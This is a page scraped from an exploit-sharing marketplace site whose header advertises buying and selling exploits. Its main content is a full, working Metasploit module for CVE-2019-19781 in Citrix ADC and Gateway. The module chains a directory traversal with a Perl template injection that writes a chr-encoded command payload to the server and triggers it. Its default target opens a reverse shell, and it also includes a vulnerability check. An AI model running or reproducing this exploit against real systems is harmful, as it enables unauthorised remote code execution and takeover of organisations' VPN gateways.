0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Citrix ADC Remote Code Execution', 'Description' => %q( An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. ), 'Author' => [ 'RAMELLA Sébastien' # https://www.pirates.re/ ], 'References' => [ ['CVE', '2019-19781'], ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'], ['EDB', '47901'], ['EDB', '47902'] ], 'DisclosureDate' => '2019-12-17', 'License' => MSF_LICENSE, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl meterpreter' } }, 'Targets' => [ ['Unix (remote shell)', 'Type' => :cmd_shell, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl', 'DisablePayloadHandler' => 'false' } ], ['Unix (command-line)', 'Type' => :cmd_generic, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic', 'DisablePayloadHandler' => 'true' } ], ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } )) register_options([ OptAddress.new('RHOST', [true, 'The target address']) ]) register_advanced_options([ OptBool.new('ForceExploit', [false, 'Override check result', false]) ]) deregister_options('RHOSTS') end def execute_command(command, opts = {}) filename = Rex::Text.rand_text_alpha(16) nonce = Rex::Text.rand_text_alpha(6) request = { 'method' => 'POST', 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'), 'headers' => { 'NSC_USER' => '../../../netscaler/portal/templates/' + filename, 'NSC_NONCE' => nonce }, 'vars_post' => { 'url' => 'http://127.0.0.1', 'title' => "[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]", 'desc' => 'desc', 'UI_inuse' => 'RfWeb' }, 'encode_params' => false } begin received = send_request_cgi(request) rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN print_error('Unable to connect on the remote target.') end return false unless received if received.code == 200 vprint_status("#{received.get_html_document.text}") sleep 2 request = { 'method' => 'GET', 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'), 'headers' => { 'NSC_USER' => nonce, 'NSC_NONCE' => nonce } } ## Trigger to gain exploitation. begin send_request_cgi(request) received = send_request_cgi(request) rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN print_error('Unable to connect on the remote target.') end return false unless received return received end return false end def get_chr_payload(command) chr_payload = command i = chr_payload.length output = "" chr_payload.each_char do | c | i = i - 1 output << "chr(" << c.ord.to_s << ")" if i != 0 output << " . " end end return output end def check begin received = send_request_cgi( "method" => "GET", "uri" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf') ) rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN print_error('Unable to connect on the remote target.') end if received && received.code != 200 return Exploit::CheckCode::Safe end return Exploit::CheckCode::Vulnerable end def exploit unless check.eql? Exploit::CheckCode::Vulnerable unless datastore['ForceExploit'] fail_with(Failure::NotVulnerable, 'The target is not exploitable.') end else print_good('The target appears to be vulnerable.') end case target['Type'] when :cmd_generic print_status("Sending #{datastore['PAYLOAD']} command payload") vprint_status("Generated command payload: #{payload.encoded}") received = execute_command(payload.encoded) if (received) && (datastore['PAYLOAD'] == "cmd/unix/generic") print_warning('Dumping command output in parsed http response') print_good("#{received.get_html_document.text}") else print_warning('Empty response, no command output') return end when :cmd_shell print_status("Sending #{datastore['PAYLOAD']} command payload") vprint_status("Generated command payload: #{payload.encoded}") execute_command(payload.encoded) end end end # 0day.today [2024-09-28] #